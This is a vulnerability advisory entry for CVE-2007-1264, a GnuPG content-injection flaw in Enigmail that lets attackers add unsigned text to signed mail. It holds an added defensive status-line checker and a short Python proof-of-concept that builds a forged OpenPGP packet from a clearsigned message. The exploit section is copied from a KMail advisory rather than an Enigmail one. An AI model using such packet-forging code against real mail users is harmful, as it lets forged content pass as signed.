Enigmail GnuPG Arbitrary Content Injection Vulnerability

Vulnerability ID 1112364 Vulnerability type Design error
Published 2007-03-05 Updated 2007-03-06
CVE ID CVE-2007-1264 CNNVD ID CNNVD-200703-215
Platform Linux CVSS score 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/29690
https://www.securityfocus.com/bid/22758
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-215
|Vulnerability details
Enigmail 0.94.2 and earlier do not use the --status-fd argument correctly when invoking GnuPG, which makes it hard for Enigmail to distinguish the signed parts of an OpenPGP message that contains multiple components from the unsigned parts. A remote attacker can forge message content without being detected.
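As an added defensive example (not code from this advisory, the exploit author, or the Enigmail project): a parser for the status lines GnuPG writes to the descriptor named by --status-fd, accepting a message only when GnuPG reports exactly one PLAINTEXT packet covered by exactly one good, valid signature. That is the distinction the description says Enigmail failed to make: a message with an extra unsigned literal packet spliced in produces a second PLAINTEXT line while the signature lines appear only once. The keywords used (PLAINTEXT, GOODSIG, VALIDSIG, BADSIG, ERRSIG) are GnuPG's documented status keywords; the sample status lines, key ID, fingerprint and addresses are constructed.

```python
"""Defensive check over GnuPG --status-fd output.

A mail client that runs `gpg --status-fd 1 --verify` (or --decrypt) gets
machine-readable "[GNUPG:] KEYWORD args" lines on that descriptor.  The
check below accepts a message only when those lines describe exactly one
plaintext covered by exactly one good, valid signature; a message that
splices an unsigned plaintext next to the signed one yields a second
PLAINTEXT line and is rejected.  All sample lines are constructed.
"""
from dataclasses import dataclass
from typing import Optional, Tuple

STATUS_PREFIX = "[GNUPG:] "


@dataclass
class StatusSummary:
    plaintexts: int = 0                 # PLAINTEXT lines: one per literal data packet
    good_sigs: int = 0                  # GOODSIG lines
    valid_sigs: int = 0                 # VALIDSIG lines (fingerprint-level confirmation)
    bad_sigs: int = 0                   # BADSIG or ERRSIG lines
    signer_keyid: Optional[str] = None  # first argument of the first GOODSIG line


def parse_status_lines(output: str) -> StatusSummary:
    """Tally the status keywords; anything on the fd that is not a status line is ignored."""
    summary = StatusSummary()
    for raw in output.splitlines():
        if not raw.startswith(STATUS_PREFIX):
            continue
        fields = raw[len(STATUS_PREFIX):].split()
        if not fields:
            continue
        keyword, args = fields[0], fields[1:]
        if keyword == "PLAINTEXT":
            summary.plaintexts += 1
        elif keyword == "GOODSIG":
            summary.good_sigs += 1
            if args and summary.signer_keyid is None:
                summary.signer_keyid = args[0]
        elif keyword == "VALIDSIG":
            summary.valid_sigs += 1
        elif keyword in ("BADSIG", "ERRSIG"):
            summary.bad_sigs += 1
    return summary


def verdict(output: str) -> Tuple[bool, str]:
    """Return (accept, reason).  Accept only one plaintext under one good signature."""
    s = parse_status_lines(output)
    if s.bad_sigs:
        return False, "bad or unverifiable signature present"
    if s.good_sigs == 0 or s.valid_sigs == 0:
        return False, "no valid signature"
    if s.good_sigs != 1:
        return False, f"{s.good_sigs} signatures, expected exactly one"
    if s.plaintexts != 1:
        return False, f"{s.plaintexts} plaintext packets, expected exactly one"
    return True, f"single plaintext signed by key {s.signer_keyid}"


# Constructed status output for an ordinary signed message: one literal
# packet, one signature.  (74 is the ASCII code of the 't' text-mode flag.)
SIGNED_ONCE = """\
[GNUPG:] PLAINTEXT 74 1173100000 original
[GNUPG:] PLAINTEXT_LENGTH 23
[GNUPG:] GOODSIG 0123456789ABCDEF Alice Example <alice@example.invalid>
[GNUPG:] VALIDSIG 0123456789ABCDEF0123456789ABCDEF01234567 2007-03-05 1173100000 0 3 0 1 2 00 0123456789ABCDEF0123456789ABCDEF01234567
[GNUPG:] TRUST_ULTIMATE
"""

# Constructed output for a message with a second, unsigned literal packet
# spliced in after the signed one: the signature lines appear once, but
# PLAINTEXT appears twice, which is the signal a careful client must act on.
SPLICED = """\
[GNUPG:] PLAINTEXT 74 1173100000 original
[GNUPG:] GOODSIG 0123456789ABCDEF Alice Example <alice@example.invalid>
[GNUPG:] VALIDSIG 0123456789ABCDEF0123456789ABCDEF01234567 2007-03-05 1173100000 0 3 0 1 2 00 0123456789ABCDEF0123456789ABCDEF01234567
[GNUPG:] TRUST_ULTIMATE
[GNUPG:] PLAINTEXT 98 1173100001 injected
"""

if __name__ == "__main__":
    for label, sample in (("signed once", SIGNED_ONCE), ("spliced", SPLICED)):
        accepted, why = verdict(sample)
        print(f"{label}: {'ACCEPT' if accepted else 'REJECT'} ({why})")
```

The counting rule is deliberately strict: a client that only looks for the presence of GOODSIG, as a text search over GnuPG's human-readable output would, sees the same "good signature" in both samples, whereas counting PLAINTEXT lines on the status descriptor separates them. A client that wants to display partially signed messages must instead track which bytes of the plaintext each signature covers, which the status lines alone do not tell it.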
|Exploit (EXP)
source: http://www.securityfocus.com/bid/22759/info

KMail is prone to a vulnerability that may allow an attacker to add arbitrary content into a message without the end user knowing.

An attacker may be able to exploit this issue to add arbitrary content into a GnuPG signed and/or encrypted message.

This vulnerability is due to the weakness discussed in BID 22757 (GnuPG Signed Message Arbitrary Content Injection Weakness) and has been assigned its own BID because of the specific way that KMail uses GnuPG.

This issue affects KMail versions prior to and including 1.9.5.

#!/usr/bin/python
import os, gpg, sys, base64

clear_sign = open(sys.argv[1], "rb").read().splitlines()

start = clear_sign.index("-----BEGIN PGP SIGNED MESSAGE-----")
mid = clear_sign.index("-----BEGIN PGP SIGNATURE-----")
end = clear_sign.index("-----END PGP SIGNATURE-----")

text = '\r\n'.join(clear_sign[start+3:mid])
sign = '\n'.join(clear_sign[mid+3:end-1])

onepass = gpg.OnePassSignature()
onepass['keyid'] = (0x12341234,0x12341234)
onepass['digest_algo'] = 2
onepass['pubkey_algo'] = 1
onepass['sigclass'] = 1

plain1 = gpg.Plaintext()
plain1['name'] = 'original'
plain1['data'] = text
plain1['mode'] = 0x62

signature = gpg.Raw()
signature['data'] = base64.decodestring(sign)

compressed = gpg.Compressed()
compressed['algorithm'] = gpg.COMPRESS_ALGO_ZLIB
compressed['data'] = [onepass, plain1, signature]

pkt = gpg.Packet()
pkt['version'] = 1
pkt['data'] = compressed

os.write(1,str(pkt))
|Affected products
Mozilla Enigmail 0.94.2
Mozilla Enigmail 0.92.1
Mozilla Enigmail 0.91
  + Debian Linux 3.1 sparc
  + Debian Linux 3.1 s/390
|References

Source: MISC
Link: http://www.coresecurity.com/?action=item&id=1687
Source: BID
Name: 22758
Link: http://www.securityfocus.com/bid/22758
Source: BUGTRAQ
Name: 20070305 CORE-2007-0115: GnuPG and GnuPG clients unsigned data injection vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/461958/30/7710/threaded
Source: BUGTRAQ
Name: 20070305 CORE-2007-0115: GnuPG and GnuPG clients unsigned data injection vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/461958/100/0/threaded
Source: SECTRACK
Name: 1017727
Link: http://www.securitytracker.com/id?1017727
Source: VUPEN
Name: ADV-2007-0835
Link: http://www.frsirt.com/english/advisories/2007/0835
Source: SREASON
Name: 2353
Link: http://securityreason.com/securityalert/2353
Source: SECUNIA
Name: 24416
Link: http://secunia.com/advisories/24416
Source: MLIST
Name: [gnupg-users] 20070306 [Announce] Multiple Messages Problem in GnuPG and GPGME
Link: http://lists.gnupg.org/pipermail/gnupg-users/2007-March/030514.html